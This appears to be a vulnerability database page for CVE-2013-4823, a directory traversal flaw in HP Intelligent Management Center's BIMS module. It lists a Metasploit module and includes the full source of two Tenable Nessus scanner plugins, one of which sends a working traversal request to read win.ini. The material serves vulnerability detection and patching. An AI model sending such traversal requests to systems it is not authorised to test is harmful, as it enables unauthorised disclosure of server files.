Vulnerabilities > CVE-2013-4823 - Information Disclosure vulnerability in HP products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
NONE Availability impact
NONE Summary
Unspecified vulnerability in HP Intelligent Management Center (iMC) and HP IMC Branch Intelligent Management System Software Module (aka BIMS) allows remote attackers to obtain sensitive information via unknown vectors, aka ZDI-CAN-1607.
Vulnerable Configurations
Metasploit
| description | This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the DownloadServlet from the BIMS component, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 with BIMS 5.1 E0201 over Windows 2003 SP2. |
| id | MSF:AUXILIARY/SCANNER/HTTP/HP_IMC_BIMS_DOWNLOADSERVLET_TRAVERSAL |
| last seen | 2020-01-18 |
| modified | 2017-07-24 |
| published | 2013-10-19 |
| references | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4823 |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb |
| title | HP Intelligent Management BIMS DownloadServlet Directory Traversal |
Nessus
NASL family Misc. NASL id HP_IMC_WEB_BIMS_FILE_DOWNLOAD.NASL description The HP Intelligent Management Center (IMC) application running on the remote host is affected by an information disclosure vulnerability in the included IMC Branch Intelligent Management System (BIMS) Module, specifically within the bimsDownload servlet, due to a failure to require authentication. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to disclose the contents of arbitrary files on the system. Note that HP IMC is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these. last seen 2020-06-01 modified 2020-06-02 plugin id 71887 published 2014-01-09 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/71887 title HP Intelligent Management Center BIMS Module Information Disclosure code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(71887); script_version("1.7"); script_cvs_date("Date: 2019/11/26"); script_cve_id("CVE-2013-4823"); script_bugtraq_id(62897); script_xref(name:"HP", value:"emr_na-c03943425"); script_xref(name:"HP", value:"HPSBGN02929"); script_xref(name:"HP", value:"SSRT101026"); script_xref(name:"ZDI", value:"ZDI-13-239"); script_name(english:"HP Intelligent Management Center BIMS Module Information Disclosure"); script_summary(english:"Attempts to exploit an information disclosure vulnerability."); script_set_attribute(attribute:"synopsis", value: "A web application hosted on the remote web server is affected by an information disclosure vulnerability."); script_set_attribute(attribute:"description", value: "The HP Intelligent Management Center (IMC) application running on the remote host is affected by an information disclosure vulnerability in the included IMC Branch Intelligent Management System (BIMS) Module, specifically within the bimsDownload servlet, due to a failure to require authentication. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to disclose the contents of arbitrary files on the system. Note that HP IMC is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these."); # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03943425 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1f8f310b"); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-239/"); script_set_attribute(attribute:"solution", value: "Upgrade the HP IMC BIMS Module to version 5.2 E0401 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-4823"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2013/10/08"); script_set_attribute(attribute:"patch_publication_date", value:"2013/10/08"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/01/09"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:intelligent_management_center"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:imc_branch_intelligent_management_system_software_module"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("hp_imc_web_interface_detect.nbin"); script_require_keys("installed_sw/HP Intelligent Management Center Web Interface"); script_require_ports("Services/www", 8080); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("url_func.inc"); include("webapp_func.inc"); appname = 'HP Intelligent Management Center Web Interface'; get_install_count(app_name:appname, exit_if_zero:TRUE); port = get_http_port(default:8080); install = get_single_install( app_name: appname, port: port, exit_if_unknown_ver:FALSE); path = mult_str(str:"../", nb:10) + "windows/win.ini"; exploit = '/imc/bimsDownload?path=' + path + '&fileName=' + path; res = http_send_recv3( port : port, method : 'GET', item : exploit, exit_on_fail : TRUE ); exploit_request = NULL; if( "[Mail]" >< res[2] || "[fonts]" >< res[2] || "; for 16-bit app support" >< res[2] ) { exploit_request = exploit; exploit_response = chomp(res[2]); } if (!isnull(exploit_request)) { report = '\n Nessus was able to exploit the vulnerability with the following' + '\n request : \n\n' + build_url(port:port, qs:exploit_request) + '\n' + '\n Server Response (contents of win.ini) : \n\n' + exploit_response + '\n'; security_report_v4(port:port, severity:SECURITY_WARNING, extra:report); } else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:'/'));NASL family Misc. NASL id HP_IMC_BIMS_52_E401.NASL description The version of the HP Intelligent Management Center Branch Intelligent Management System module on the remote host is a version prior to 5.2 E0401 and is potentially affected by multiple vulnerabilities : - The last seen 2020-06-01 modified 2020-06-02 plugin id 71891 published 2014-01-09 reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/71891 title HP Intelligent Management Center Branch Intelligent Management Module Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(71891); script_version("1.7"); script_cvs_date("Date: 2018/11/15 20:50:23"); script_cve_id("CVE-2013-4822", "CVE-2013-4823"); script_bugtraq_id(62895, 62897); script_name(english:"HP Intelligent Management Center Branch Intelligent Management Module Multiple Vulnerabilities"); script_summary(english:"Checks version"); script_set_attribute( attribute:"synopsis", value: "The version of the HP Branch Intelligent Management System module on the remote host is affected by multiple vulnerabilities." ); script_set_attribute( attribute:"description", value: "The version of the HP Intelligent Management Center Branch Intelligent Management System module on the remote host is a version prior to 5.2 E0401 and is potentially affected by multiple vulnerabilities : - The 'bimsDownload' servlet is not protected by authentication and could be used to access any file on the system remotely. (CVE-2013-4823) - The 'UploadServlet' in the BIM module allows unauthenticated users to remotely upload arbitrary files to specific locations on the host. (CVE-2013-4822)" ); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-238/"); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-239/"); # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03943425 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1f8f310b"); script_set_attribute(attribute:"solution", value:"Upgrade the iMC BIMs module to version 5.2 E0401 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"HP Intelligent Management Center BIMS UploadServlet File Upload"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'HP Intelligent Management Center BIMS UploadServlet Directory Traversal'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2013/10/08"); script_set_attribute(attribute:"patch_publication_date", value:"2013/09/30"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/01/09"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:intelligent_management_center"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc."); script_dependencies('hp_imc_detect.nbin'); script_require_ports('Services/activemq', 61616); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); # Figure out which port to use port = get_service(svc:'activemq', default:61616, exit_on_fail:TRUE); version = get_kb_item_or_exit('hp/hp_imc/' + port + '/components/iMC-BIMS/version'); # Versions 5.1 E0201 and earlier are affected if (version =~ '^([0-4]\\.|5\\.(0\\-|1\\-E0([0-9]{1,2}|[01][0-9]{2}|20[01])([^0-9]|$)))') { if (report_verbosity > 0) { report = '\n Installed version : ' + version + '\n Fixed version : 5.2-E0401' + '\n'; security_hole(port:port, extra:report); } else security_hole(port); exit(0); } else audit(AUDIT_LISTEN_NOT_VULN, 'HP Intelligent Management Center BIMS Component', port, version);